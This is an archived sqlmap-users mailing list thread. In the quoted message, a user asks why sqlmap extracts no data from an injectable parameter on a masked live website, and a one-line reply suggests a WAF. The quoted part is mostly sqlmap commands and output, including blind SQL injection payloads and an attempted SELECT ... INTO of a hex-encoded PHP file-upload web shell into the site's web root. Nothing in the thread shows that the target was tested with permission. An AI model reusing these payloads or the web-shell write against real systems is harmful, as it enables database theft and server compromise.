Hi.
Have you considered that it might be behind some WAF?
Bye
On Jan 22, 2014 6:28 AM, "Alok Kumar" <mypentest...@gmail.com> wrote:
> Hello members, need your help to solve this mystery,
> my manual assessment against a web application revealed possibility of
> sqlinjection vulnerability which has been reconfirmed using Netsparker
> automated web application assessment tool.
>
> I then used sqlmap to exploit the sqlinjection flaw to do something
> interesting but none of them worked for me, even sqlmap says the parameter
> is injectable and infact it actually exploited the issue but unfortunately
> with ZERO results.
>
> I tried almost everything from "--current-db, --dbs, --banner", and
> everything found to be executed with result value as NONE.
>
> I even tried --sql-shell which gave me an sql-shell> prompt, but whatever
> query I tried it gave ZERO result without any error, I did tried some
> custom query but that didn't worked because of Stacked query limitation.
>
> I'm positively sure that target parameter is injectable but couldn't make
> out why it is not executing and/or giving any response to my query
>
> Please help me in this, Thanks in advance!
>
> I have also posted two of the query which I executed for your reference.
>
>
> SQLMap query output
> ************************************************************** First query
> **************************************************************
>
> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
> http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast
> --time-sec=10 -t xxix-output
>
> sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 18:54:00
>
> [18:54:00] [INFO] setting file for logging HTTP traffic
> [18:54:00] [INFO] resuming back-end DBMS 'mysql'
> [18:54:00] [INFO] testing connection to the target URL
> [18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: cid
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: cid=1111111 AND 1062=1062
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: cid=1111111 AND SLEEP(10)
> ---
> [18:54:00] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx, PHP 5.3.10
> back-end DBMS: MySQL 5.0.11
> [18:54:00] [INFO] fetching current database
> [18:54:00] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval
> [18:54:00] [INFO] retrieved:
> [18:54:01] [INFO] heuristics detected web page charset 'ascii'
>
> [18:54:01] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [18:54:07] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based payloads
>
> [18:54:08] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> current database: None
> [18:54:08] [INFO] fetched data logged to text files under
> '/pentest/database/sqlmap/output/www.xxxxxx.com'
>
> [*] shutting down at 18:54:08
>
>
> ************************************************************** Second
> query **************************************************************
> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
> http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell
> sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 18:18:17
>
> [18:18:17] [INFO] resuming back-end DBMS 'mysql'
> [18:18:17] [INFO] testing connection to the target URL
> [18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: cid
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: cid=1111111 AND 1062=1062
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: cid=1111111 AND SLEEP(10)
> ---
> [18:18:18] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx, PHP 5.3.10
> back-end DBMS: MySQL 5.0.11
> [18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
> ENTER
> sql-shell> user()
> [18:18:25] [INFO] fetching SQL query output: 'user()'
> [18:18:25] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval
> [18:18:25] [INFO] retrieved:
> [18:18:25] [INFO] heuristics detected web page charset 'ascii'
>
> [18:18:26] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [18:18:32] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based payloads
>
> [18:18:33] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> sql-shell> user() --hex
> [18:18:59] [INFO] fetching SQL query output: 'user() --hex'
> [18:18:59] [INFO] retrieved:
> [18:19:00] [INFO] retrieved:
> sql-shell> select
> 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
> into "/var/www/xxxxxx.com/upload.php"; --hex
> [18:19:16] [WARNING] execution of custom SQL queries is only available
> when stacked queries are supported
> sql-shell> db_name --hex
> [18:19:29] [INFO] fetching SQL query output: 'db_name --hex'
> [18:19:29] [INFO] retrieved:
> [18:19:29] [INFO] retrieved:
> sql-shell> x
> [18:19:39] [INFO] fetched data logged to text files under
> '/pentest/database/sqlmap/output/www.xxxxxx.com'
>
> [*] shutting down at 18:19:39
>
>
>
> ------------------------------------------------------------------------------
> CenturyLink Cloud: The Leader in Enterprise Cloud Services.
> Learn Why More Businesses Are Choosing CenturyLink Cloud For
> Critical Workloads, Development Environments & Everything In Between.
> Get a Quote or Start a Free Trial Today.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
CenturyLink Cloud: The Leader in Enterprise Cloud Services.
Learn Why More Businesses Are Choosing CenturyLink Cloud For
Critical Workloads, Development Environments & Everything In Between.
Get a Quote or Start a Free Trial Today.
http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
